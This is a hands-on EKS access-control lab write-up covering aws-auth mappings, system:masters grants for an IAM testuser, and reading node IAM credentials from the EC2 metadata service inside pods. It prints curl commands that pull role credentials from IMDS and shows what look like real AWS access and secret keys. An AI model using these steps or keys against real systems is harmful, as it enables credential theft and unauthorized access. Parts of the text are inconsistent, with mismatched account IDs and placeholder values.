vpc-resource-validating-webhook 2 5h22m
# system:masters and system:authenticated group information
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
      username: system:node:{{EC2PrivateDNSName}}

kubectl rbac-tool lookup system:masters
kubectl rbac-tool lookup system:authenticated
kubectl rolesum -k Group system:masters
kubectl rolesum -k Group system:authenticated

# The ClusterRole that the system:masters group is bound to
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe clusterrolebindings.rbac.authorization.k8s.io cluster-admin

Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
Role:
Kind: ClusterRole
Name: cluster-admin
Subjects:
Kind Name Namespace
---- ---- ---------
Group system:masters
# cluster-admin's policy rules -- full access to all resources
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe clusterrole cluster-admin

Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
[*] [] [*]

The validatingwebhookconfigurations resource is specifically used to validate changes to certain Kubernetes objects, such as the aws-auth ConfigMap. These webhook configurations ensure that only authorized modifications are allowed to critical cluster resources.

Practice: Organizing a Distributed-Environment Exercise for DevOps Newcomers

Let’s assume we have two bastion hosts: one for the master (cluster creator) account and one for a newcomer joining the DevOps team.

Step 1: [myeks-bastion] Create a testuser user with AdministratorAccess permissions

  1. Create a testuser user using the command aws iam create-user --user-name testuser.
  2. Grant the user programmatic access by creating an access key using aws iam create-access-key --user-name testuser.
  3. Attach the AdministratorAccess policy to the testuser user using aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser.
  4. Verify the caller identity using aws sts get-caller-identity --query Arn.
  5. Check the kubectl identity using kubectl whoami.
  6. Retrieve the public IP address of the myeks-bastion-EC2-2 instance using aws ec2 describe-instances.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam create-user --user-name testuser

{
"User": {
"Path": "/",
"UserName": "testuser",
"UserId": "AIDA2LU4OVCKXVBRCEGDT",
"Arn": "arn:aws:iam::712218945685:user/testuser",
"CreateDate": "2024-04-13T08:11:13+00:00"
}
}
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam create-access-key --user-name testuser
{
"AccessKey": {
"UserName": "testuser",
"AccessKeyId": "AKIA2LU4OVCKY6UBONWB",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2024-04-13T08:14:44+00:00"
}
}
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:root"

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl whoami
arn:aws:iam::712218945685:root

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws ec2 describe-instances --query "Reservations[*].Instances[*].{PublicIPAdd:PublicIpAddress,PrivateIPAdd:PrivateIpAddress,InstanceName:Tags[?Key=='Name']|[0].Value,Status:State.Name}" --filters Name=instance-state-name,Values=running --output table
-------------------------------------------------------------------------------------------
| DescribeInstances |
+------------------------------------------+----------------+-----------------+-----------+
| InstanceName | PrivateIPAdd | PublicIPAdd | Status |
+------------------------------------------+----------------+-----------------+-----------+
| sigridjin-ekscluster-240413-3-ng1-Node | 192.168.1.11 | 13.125.179.47 | running |
| sigridjin-ekscluster-240413-3-bastion-2 | 192.168.1.200 | 3.35.175.109 | running |
| sigridjin-ekscluster-240413-3-bastion | 192.168.1.100 | 43.203.181.160 | running |
| sigridjin-ekscluster-240413-3-ng1-Node | 192.168.2.154 | 3.37.29.245 | running |
| sigridjin-ekscluster-240413-3-ng1-Node | 192.168.3.122 | 3.37.128.191 | running |
+------------------------------------------+----------------+-----------------+-----------+

Step 2: [myeks-bastion-2] Set up and verify testuser credentials

  1. Configure the testuser credentials using aws configure and provide the AccessKeyID and SecretAccessKey obtained in step 1.2.
  2. Verify the caller identity using aws sts get-caller-identity --query Arn. If the user has no permissions, the command will fail.
  3. Confirm that the testuser is now visible in the IAM console.
  4. Attempt to use kubectl with kubectl get node -v6. It will fail because the ~/.kube/config file is missing, even though the testuser has AdministratorAccess permissions.
[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws configure
AWS Access Key ID [None]: aws configure
AWS Secret Access Key [None]: asdf
Default region name [None]: ap-northeast-2
Default output format [None]: json
---
[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:user/testuser"
---
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get nodes -v6
I0413 17:26:51.247920 2457 round_trippers.go:553] GET http://localhost:8080/api?timeout=32s in 0 milliseconds
E0413 17:26:51.248015 2457 memcache.go:265] couldn't get current server API group list: Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# ls ~/.kube
ls: cannot access /root/.kube: No such file or directory

Step 3: [myeks-bastion] Grant system:masters group permissions to testuser for EKS administrator-level access

Method 1: Use eksctl to create an IAM identity mapping. Run eksctl create iamidentitymapping --cluster $CLUSTER_NAME --username testuser --group system:masters --arn arn:aws:iam::$ACCOUNT_ID:user/testuser. This command writes to the aws-auth ConfigMap.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl create iamidentitymapping --cluster $CLUSTER_NAME --username testuser --group system:masters --arn arn:aws:iam::$ACCOUNT_ID:user/testuser
2024-04-13 17:47:31 [ℹ] checking arn arn:aws:iam::712218945685:user/testuser against entries in the auth ConfigMap
2024-04-13 17:47:31 [ℹ] adding identity "arn:aws:iam::712218945685:user/testuser" to auth ConfigMap

# verify
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
      username: system:node:{{EC2PrivateDNSName}}
  mapUsers: |
    - groups:
      - system:authenticated
      userarn: arn:aws:iam::911283464785:user/testuser
      username: testuser
    - groups:
      - system:masters
      userarn: arn:aws:iam::712218945685:user/testuser
      username: testuser
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
...

kubectl get validatingwebhookconfigurations eks-aws-auth-configmap-validation-webhook -o yaml | kubectl neat | yh

Method 2: Directly edit the aws-auth ConfigMap using kubectl edit cm -n kube-system aws-auth and add the testuser to the mapUsers section with the system:masters group.

kubectl edit cm aws-auth -n kube-system
---
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::911283464785:role/eksctl-myeks-nodegroup-ng1-NodeInstanceRole-LHQ7DWHQQRZJ
      username: system:node:{{EC2PrivateDNSName}}
  mapUsers: |
    - groups:
      - system:masters
      userarn: arn:aws:iam::911283464785:user/testuser
      username: testuser
---
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
      username: system:node:{{EC2PrivateDNSName}}
  mapUsers: |   # add the mapUsers section here
    - groups:
      - system:masters
      userarn: arn:aws:iam::911283464785:user/testuser
      username: testuser
kind: ConfigMap
metadata:
  creationTimestamp: "2024-04-13T02:49:50Z"
  name: aws-auth
  namespace: kube-system
  resourceVersion: "1566"
  uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::911283464785:user/testuser testuser system:masters
  1. Verify the IAM identity mapping using eksctl get iamidentitymapping --cluster $CLUSTER_NAME.
  2. Understand the role of the existing role/eksctl-myeks-nodegroup-ng1-NodeInstanceRole-YYYYY.

Step 4: [myeks-bastion-2] Create testuser kubeconfig and verify kubectl usage

  1. Generate the kubeconfig for testuser using aws eks update-kubeconfig --name $CLUSTER_NAME --user-alias testuser. The AWS-side call succeeds because testuser has AdministratorAccess (which includes eks:DescribeCluster); the system:masters mapping added in Step 3 is what makes the subsequent kubectl calls succeed.
  2. Compare the generated ~/.kube/config with the one on the first bastion EC2.
  3. Verify kubectl usage with kubectl ns default and kubectl get node -v6.
  4. Install the rbac-tool using kubectl krew install rbac-tool and check the testuser's identity with kubectl rbac-tool whoami. Compare the output with the existing account.
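
On the second bastion, the steps above boil down to roughly the following commands (run with the testuser credentials; $CLUSTER_NAME must be set to the actual cluster name):

# Write a kubeconfig entry for the cluster, aliasing the user as "testuser"
aws eks update-kubeconfig --name $CLUSTER_NAME --region ap-northeast-2 --user-alias testuser

# Sanity checks with the new kubeconfig
kubectl get node -v6
kubectl krew install rbac-tool
kubectl rbac-tool whoami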
[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl get node -v6
I0413 17:38:19.336348 2730 loader.go:395] Config loaded from file: /home/ec2-user/.kube/config
I0413 17:38:20.995501 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 1658 milliseconds
E0413 17:38:20.996740 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:20.996770 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:21.949170 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 952 milliseconds
E0413 17:38:21.949597 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:21.949631 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:21.949645 2730 shortcut.go:100] Error loading discovery information: the server has asked for the client to provide credentials
I0413 17:38:22.892015 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 942 milliseconds
E0413 17:38:22.892907 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:22.892927 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:23.875638 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 982 milliseconds
E0413 17:38:23.875977 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:23.875995 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:24.657330 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 781 milliseconds
E0413 17:38:24.657651 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:24.657672 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:24.657824 2730 helpers.go:246] server response object: [{
"metadata": {},
"status": "Failure",
"message": "the server has asked for the client to provide credentials",
"reason": "Unauthorized",
"details": {
"causes": [
{
"reason": "UnexpectedServerResponse",
"message": "unknown"
}
]
},
"code": 401
}]
error: You must be logged in to the server (the server has asked for the client to provide credentials)
[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl get node -v6
I0413 17:48:52.675473 3186 loader.go:395] Config loaded from file: /home/ec2-user/.kube/config
I0413 17:48:53.450493 3186 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 200 OK in 774 milliseconds
I0413 17:48:53.454494 3186 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/apis?timeout=32s 200 OK in 2 milliseconds
I0413 17:48:53.473353 3186 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 200 OK in 6 milliseconds
NAME STATUS ROLES AGE VERSION
ip-192-168-1-11.ap-northeast-2.compute.internal Ready <none> 5h58m v1.28.5-eks-5e0fdde
ip-192-168-2-154.ap-northeast-2.compute.internal Ready <none> 5h58m v1.28.5-eks-5e0fdde
ip-192-168-3-122.ap-northeast-2.compute.internal Ready <none> 5h58m v1.28.5-eks-5e0fdde

[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl rbac-tool whoami
{Username: "testuser",
UID: "aws-iam-authenticator:712218945685:AIDA2LU4OVCKXVBRCEGDT",
Groups: ["system:masters",
"system:authenticated"],
Extra: {accessKeyId: ["AKIA2LU4OVCKY6UBONWB"],
arn: ["arn:aws:iam::712218945685:user/testuser"],
canonicalArn: ["arn:aws:iam::712218945685:user/testuser"],
principalId: ["AIDA2LU4OVCKXVBRCEGDT"],
sessionName: [""]}}

Step 5: Modifying the aws-auth ConfigMap

  • The aws-auth ConfigMap can be edited using the command kubectl edit cm -n kube-system aws-auth.
  • In the provided example, the ConfigMap is modified to change the testuser’s group from “system:masters” to “system:authenticated”.
  • This change is reflected in the mapUsers section of the ConfigMap, where the testuser's userarn is mapped to the "system:authenticated" group.
# kubectl edit cm -n kube-system aws-auth

apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
      username: system:node:{{EC2PrivateDNSName}}
  mapUsers: |
    - groups:
      - system:authenticated
      userarn: arn:aws:iam::911283464785:user/testuser
      username: testuser
kind: ConfigMap
metadata:
  creationTimestamp: "2024-04-13T02:49:50Z"
  name: aws-auth
  namespace: kube-system
  resourceVersion: "82097"
  uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e

# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::712218945685:user/testuser testuser system:authenticated

Step 6: Testing Permissions on myeks-bastion-2

  • After modifying the aws-auth ConfigMap on the bastion host (myeks-bastion), the testuser’s permissions are tested on myeks-bastion-2.
  • Since the testuser’s group has been changed to “system:authenticated”, certain commands like kubectl get nodes no longer work due to insufficient permissions.
  • However, the testuser can still execute commands like kubectl api-resources, which lists the available API resources in the cluster.
[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl api-resources
NAME SHORTNAMES APIVERSION NAMESPACED KIND
bindings v1 true Binding
componentstatuses cs v1 false ComponentStatus
configmaps cm v1 true ConfigMap
endpoints ep v1 true Endpoints
events ev v1 true Event
limitranges limits v1 true LimitRange

Step 7: Deleting IAM Mapping on myeks-bastion

  • On the myeks-bastion host, the IAM mapping for the testuser is deleted using the command eksctl delete iamidentitymapping.
  • After deleting the IAM mapping, the testuser’s access to the cluster is further restricted.
  • The testuser can no longer execute commands like kubectl api-resources, indicating a complete revocation of permissions.
eksctl delete iamidentitymapping --cluster $CLUSTER_NAME --arn  arn:aws:iam::$ACCOUNT_ID:user/testuser
eksctl get iamidentitymapping --cluster $CLUSTER_NAME
kubectl get cm -n kube-system aws-auth -o yaml | yh

Practice: Node IAM Roles, aws-auth mapRoles, and the EC2 Instance Metadata Service

1. Checking the mapRoles for nodes:

  • The command for node in $N1 $N2 $N3; do ssh ec2-user@$node aws sts get-caller-identity --query Arn; done is used to retrieve the IAM role ARN associated with each node.
  • The output shows that the nodes are assuming the role eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR with their respective instance IDs.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node aws sts get-caller-identity --query Arn; done

"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-08eab2d8a5919161d"
"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-05b1286bbe75f7de3"
"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-0a9e63d090f9d4c18"

2. Examining the aws-auth ConfigMap:

  • The command `kubectl describe configmap -n kube-system aws-auth` is used to describe the aws-auth ConfigMap.
  • The output reveals that the role "eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR" is mapped to the groups "system:bootstrappers" and "system:nodes".
  • The command `eksctl get iamidentitymapping --cluster $CLUSTER_NAME` is used to get the IAM identity mapping for the cluster.
  • It confirms that the role is mapped to the username "system:node:{{EC2PrivateDNSName}}" and the groups "system:bootstrappers" and "system:nodes".
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe configmap -n kube-system aws-auth

Name: aws-auth
Namespace: kube-system
Labels: <none>
Annotations: <none>

Data
====
mapRoles:
----
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}

mapUsers:
----
[]


BinaryData
====

Events: <none>

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes

Tip) Understanding the difference between "system:nodes" and "system:bootstrappers" groups:

- The "system:nodes" group is assigned to all nodes in the cluster and grants them permissions to communicate with the Kubernetes API server and perform necessary tasks within the cluster.

- The "system:bootstrappers" group is assigned to newly added nodes during the bootstrap process and grants them permissions to perform initial authentication and configuration.

- Once a node is successfully bootstrapped, it transitions from the "system:bootstrappers" group to the "system:nodes" group.
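
To see what each of these groups can actually do in this cluster, the rbac-tool and rolesum plugins used earlier can be pointed at them (output depends on the cluster's bindings):

# Which ClusterRoles/Roles are bound to the node-related groups?
kubectl rbac-tool lookup system:nodes
kubectl rbac-tool lookup system:bootstrappers

# Summarize the effective permissions per group
kubectl rolesum -k Group system:nodes
kubectl rolesum -k Group system:bootstrappers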

3. Creating an AWS CLI v2 pod for accessing EC2 Instance Metadata Service (IMDS):

  • A Deployment named "awscli-pod" is created using the provided YAML configuration.
  • The Deployment runs two replicas of a pod using the "amazon/aws-cli" image.
  • The command `kubectl get pod -owide` is used to retrieve information about the running pods, including their names and the nodes they are scheduled on.
  • The pod names are stored in the variables `APODNAME1` and `APODNAME2`.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat <<EOF | kubectl create -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: awscli-pod
spec:
  replicas: 2
  selector:
    matchLabels:
      app: awscli-pod
  template:
    metadata:
      labels:
        app: awscli-pod
    spec:
      containers:
      - name: awscli-pod
        image: amazon/aws-cli
        command: ["tail"]
        args: ["-f", "/dev/null"]
      terminationGracePeriodSeconds: 0
EOF
deployment.apps/awscli-pod created

-----
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod -owide

NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 18s 192.168.3.158 ip-192-168-3-122.ap-northeast-2.compute.internal <none> <none>
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 18s 192.168.2.145 ip-192-168-2-154.ap-northeast-2.compute.internal <none> <none>

-----
APODNAME1=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[0].metadata.name})
APODNAME2=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[1].metadata.name})
echo $APODNAME1, $APODNAME2

kubectl exec -it $APODNAME1 -- bash

4. Retrieving EC2 InstanceProfile (IAM Role) information from the awscli pods:

  • The command `kubectl exec -it $APODNAME1 -- aws sts get-caller-identity --query Arn` is used to retrieve the IAM role ARN associated with the first awscli pod.
  • The command `kubectl exec -it $APODNAME2 -- aws sts get-caller-identity --query Arn` is used to retrieve the IAM role ARN associated with the second awscli pod.
  • The output confirms that the pods are assuming the same IAM role as the nodes they are running on.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it $APODNAME1 -- aws sts get-caller-identity --query Arn
kubectl exec -it $APODNAME2 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-0a9e63d090f9d4c18"

6. Accessing AWS services from the awscli pods using the EC2 InstanceProfile (IAM Role):

  • The command `kubectl exec -it $APODNAME1 -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager` is used to describe EC2 instances using the IAM role associated with the first awscli pod.
  • The command `kubectl exec -it $APODNAME2 -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager` is used to describe VPCs using the IAM role associated with the second awscli pod.
  • These commands demonstrate that the pods can access AWS services using the IAM role of the node they are running on, without requiring separate IAM credentials.
kubectl exec -it $APODNAME1 -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it $APODNAME2 -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager

7. Verifying EC2 metadata and retrieving IAM role information:

  • The command kubectl exec -it $APODNAME1 -- bash is used to enter a bash shell in the first awscli pod.
  • The IMDS is a service that provides metadata about the EC2 instance, including the IAM role associated with it. By default, any pod running on a node can access the IMDS and retrieve the IAM role information. This means that if a malicious actor gains access to a poorly secured container, they can potentially exploit the IMDS to obtain the IAM role associated with the node and gain unauthorized access to services.
  • To mitigate this risk, it is essential to follow the principle of least privilege. This means granting only the minimal permissions necessary for a pod or container to perform its intended functions. By carefully restricting the permissions associated with the IAM roles assigned to nodes, you can limit the potential impact of a compromised container.
kubectl exec -it $APODNAME1 -- bash
  • Inside the pod, the command curl -s http://169.254.169.254/ -v is used to retrieve the EC2 metadata.
  • The command curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" is used to obtain a token for accessing the EC2 Instance Metadata Service (IMDS) version 2.
  • The token is then used to retrieve the IAM role information using the command curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR.
  • The output includes temporary security credentials (AccessKeyId, SecretAccessKey, and Token) that can be used to access AWS services until the specified expiration time.
bash-4.2# ls
curl -s http://169.254.169.254/ -v

bash-4.2# curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" ; echo
sadfafsd==

bash-4.2# curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" ; echo
dsfdsf==

bash-4.2# TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
bash-4.2# echo $TOKEN
asdfasdf

curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
----------------------
{
"Code" : "Success",
"LastUpdated" : "2024-04-13T08:32:10Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "dfdfdfdf",
"SecretAccessKey" : "dffd/EgpZxGrV4f0vyrjjt9Zf6ccH",
"Token" : "IQoJb3JpZ2luX2VjEDkaDmFwLW5vcnRoZWFzdC0yIkcwRQIhAO1iqPVSb222Tr7irif1FbNnnC48XiO29GFLiQI9vgNaAiB4tsOOZZTWVuO9zLqsun+KYoEG/r18vUAIsvIDE5NTHirMBQhyEAEaDDcxMjIxODk0NTY4NSIMgm9YDn9JNpjZFE3uKqkFxgZxQ5FpCzdj/GIo8zbb+lW8ZRYaFVb5A43HJmp5sTQP7hqGJVTQ8qOzADpPszee87b8PcDZi3dgKk0uWO7v7sZvuNJ8MmUwhJw5oU/p887eJugBVJVwbFUGcgoaqqWGfWd7yY6tNs+MPcEsi20D//HAFm3NTG2KyWrkdpxl+jeNX8Tu7gluM7zzNY0BorRwmPM0YVpA2EGoMvi+f8UATcscI7uNmRwAVdOBGkHejycpjNJ0/JtTN++y0FwpX3usx0iEYhYn7kfJYUMEtCOMiqpXUCqV+cfUynvJAYdr00+lhv0jufAz8GOJI2QDhg1aNrq4jrdc+fxoWAaB6clzjwqtcAb2QGnuD0RBPwNzGF/XBqTtgM/PKOzyqOzQnvFw/lg5iJFbqZQ04GFriSXkZoUpLeG4vg4dMpxcWfV1n62UPAafavf7ofuwcQerOEuTQEzeqlchiOU7cSNyOEgmTYCvHFpCk7GQYwTIpahg3zTmB4nDBsUyhihaeV9wEe08xD7uc/qj/CiMnUozctpYFIZfgSyJzoZ2T+S9eYVgUOAUTLtaGLvSJ11aXe8sjWuuP8OTCH+LXP6/+09njxtHejojY9pyKp+fpQCRuFTEAtKn4rrkiOEX2b/pgZOPBDVBqLZGsyBg+i/XsM4BMjFKtkvfLf3ZmFdadsFRkqx8umnrWJkCAn4zUTm+ax3NOChr0Ll3ja8XW7jNxSfjeHBWg8tFsP3llgv3zvmdbx3tsneVyrqL8vbxdLNoSb4u0/mazxvDXHFOORt8gE4+5DXURTDukAaNyo9qT7A3yBgWdzI3eFNxvlpn0LPgHEjZE1PeT625fj7W3qgzaqdBo5a+JQGfOGF/Oe+cI5KntusEqR7JzRd4AOzB8ZFQGXchoiDdKgfJhFUFMKhiMOCF6bAGOrEBfOGgHy/78QlITIf+PR15VCzNlf52VhLY8rQxGplHPYMA/Q0R+OkCOw2Yz7PWJOzsJsjH+ofTjTG95WvcWoRiHAbDOWSHTSTbUGOgp3XqxjpGn/XNcYS2lgmLXMr6WMkOXdLbW3qDvhHIEDCdTqxVJ5UgFAgxSfdqF2E37HST3sSDqyb+fs55t5q/fqzMnK2Fe5YByXrc6HNwGDBbYaN8TQ4nFbGMnVAZsl/j3PNSRXvO",
"Expiration" : "2024-04-13T14:54:46Z"
}
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# export NODE_ROLE=eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
  user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- --region
- ap-northeast-2
- eks
- get-token
- --cluster-name
- sigridjin-ekscluster-240413-3
- --output
- json
- --role
- eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR

---
kubectl exec -it $APODNAME2 -- cat /root/.kube/config | yh

The command kubectl exec -it $APODNAME2 -- cat /root/.kube/config | yh is used to retrieve the kubeconfig file from the second awscli pod.

The kubeconfig file's exec section passes the --role argument, so kubectl requests a token for the node instance role ARN shown above. The IAM role and the policies attached to the worker nodes can be verified in the AWS Management Console.

Practice 3: A deep dive into simplified Amazon EKS access management controls

